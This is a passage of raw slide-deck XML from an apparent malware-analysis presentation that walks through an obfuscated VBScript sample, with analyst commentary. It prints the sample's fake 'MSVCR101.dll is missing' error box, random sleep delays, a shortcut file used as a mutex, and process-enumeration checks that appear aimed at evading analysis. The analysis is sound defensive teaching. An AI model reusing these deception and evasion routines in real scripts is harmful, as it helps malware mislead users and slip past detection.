                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execute(limpet(VTGBqYZh)):    REM DlAMe() - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>HTTP GET </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>execute(limpet(hgSa)):   	 REM bRDW() - F_MESSAGE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>fake error message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execute(limpet(tbSE)):   	 REM GewqX() - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>MsgBox - debugging</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>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highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>execute(limpet(SEFHujyIz)):    REM baronial() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>F_LOCKFILE - adobe.url</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>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execute(limpet(idmIdh)):    REM tawny() - F_COUNTERS - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>sleep</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execute(limpet(twYte)):   	 REM ucMHV() - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>if file exists "%USERPROFILE%\Downloads\82984.txt", return 0, else return 1</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk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412" name="Shape 412"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413" name="Google Shape;413;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bRDW() - F_MESSAGE - False Flag?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="414" name="Google Shape;414;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Function bRDW()</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GewqX("DEBUG: F_MESSAGE - Start")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Dim chivalrous,pbI</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chivalrous=30000</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pbI=5000</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Randomize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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>With WScript</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="00FF00"/>
              </a:highlight>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highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>   	 .Sleep Int((chivalrous-pbI+1)*Rnd+pbI)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="00FF00"/>
              </a:highlight>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End With</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vOPU = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>MsgBox("Cant start because MSVCR101.dll is missing from your computer. Try reinstalling the program to fix this problem.", vbSystemModal+vbCritical, "System Error")</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>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GewqX("DEBUG: F_MESSAGE - True")</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>End Function</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk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418" name="Shape 418"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="419" name="Google Shape;419;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Oh Noes, MSVCR101.dll is missing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="420" name="Google Shape;420;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421" name="Google Shape;421;p70"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="667325" y="1256399"/>
            <a:ext cx="7920625" cy="26682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425" name="Shape 425"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="426" name="Google Shape;426;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wtf is MSVCR101.dll?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="427" name="Google Shape;427;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428" name="Google Shape;428;p71"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1640375" y="943350"/>
            <a:ext cx="5101674" cy="4200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Hashes are at the bottom of the Pyramid of Pain</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87" name="Google Shape;87;p18"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1685755" y="1152480"/>
            <a:ext cx="5463950" cy="387542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432" name="Shape 432"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="433" name="Google Shape;433;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baronial() - F_LOCKFILE - adobe.url - mutex?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="434" name="Google Shape;434;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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Function baronial()</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rPr>
              <a:t>    GewqX("DEBUG: F_LOCKFILE - Start")</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rPr>
              <a:t>    Dim chivalrous,pbI</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rPr>
              <a:t>    chivalrous=10000</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rPr>
              <a:t>    pbI=4000</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rPr>
              <a:t>    Randomize</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rPr>
              <a:t>    With WScript</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rPr>
              <a:t>   	 .Sleep Int((chivalrous-pbI+1)*Rnd+pbI)</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rPr>
              <a:t>    End With</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rPr>
              <a:t>    Dim KstO: Set KstO = CreateObject("WScript.Shell")</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rPr>
              <a:t>    Dim sherry: Set sherry = CreateObject("Scripting.FileSystemObject")</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="41609"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2643">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>    If (sherry.FileExists(sandhill + "adobe.url")) Then</a:t>
            </a:r>
            <a:endParaRPr sz="2643">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="41609"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2643">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>   	 GewqX("DEBUG: F_LOCKFILE - False")</a:t>
            </a:r>
            <a:endParaRPr sz="2643">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="41609"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2643">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   	 Ldj</a:t>
            </a:r>
            <a:endParaRPr sz="2643">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="41609"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2643">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2643">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Else</a:t>
            </a:r>
            <a:endParaRPr sz="2643">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="00FF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="41609"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2643">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>   	 With KstO.createShortcut(sandhill + "adobe.url")</a:t>
            </a:r>
            <a:endParaRPr sz="2643">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="00FF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="41609"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2643">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>   		 .TargetPath = "https://adobe.com"</a:t>
            </a:r>
            <a:endParaRPr sz="2643">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="00FF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="41609"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2643">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>   		 .Save()</a:t>
            </a:r>
            <a:endParaRPr sz="2643">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="00FF00"/>
              </a:highlight>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rPr>
              <a:t>   	 End With</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rPr>
              <a:t>   	 GewqX("DEBUG: F_LOCKFILE - True")</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rPr>
              <a:t>    End If</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>End Function</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk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438" name="Shape 438"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="439" name="Google Shape;439;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wtf is sandhill? - Return the %TMP% folder</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440" name="Google Shape;440;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Function sandhill()</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sandhill = CStr(WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(((((29 + 18.0) + (-42.0)) + 54.0) + (-57.0))) + "\")</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>End Function</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&gt;echo %TMP%</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C:\Users\john\AppData\Local\Temp</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="441" name="Google Shape;441;p73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5768613" y="2728175"/>
            <a:ext cx="2428875" cy="13906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445" name="Shape 445"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="Google Shape;446;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adobe.url - Just a shortcut, doesn't do anything malicious</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="447" name="Google Shape;447;p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448" name="Google Shape;448;p74"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="697123" y="1152475"/>
            <a:ext cx="7631526" cy="3721529"/>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452" name="Shape 452"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="453" name="Google Shape;453;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baronial() - F_LOCKFILE - Conclusion</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="454" name="Google Shape;454;p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If (sherry.FileExists(sandhill + "adobe.url")) Then</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GewqX("DEBUG: F_LOCKFILE - False")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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Ldj</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>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If the shortcut exists, quit and destroy the evidence, so yeah, a mutex.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Why a mutex like this?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There's nothing malicious about it, would an Incident Responder notice it and identify it as an IOC?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk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458" name="Shape 458"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="459" name="Google Shape;459;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numb() - FS_PROCESS - check processes</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="460" name="Google Shape;460;p7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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Set setupService = GetObject("winmgmts:\\.\root\cimv2")</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rPr>
              <a:t>Set judiciouslItems = setupService.ExecQuery(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>"Select * from Win32_Process")</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>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rPr>
              <a:t>    For Each inhwg In judiciouslItems</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rPr>
              <a:t>   	 BgId = BgId + 1</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rPr>
              <a:t>   	 For Each GOx In Brenner</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highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>   		 If inhwg.Name = GOx Then</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="00FF00"/>
              </a:highlight>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highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>   			 GewqX("DEBUG: FS_PROCESS - False")</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="00FF00"/>
              </a:highlight>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highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>   			 GewqX("DEBUG: FS_PROCESSCOUNT - Terminated")</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
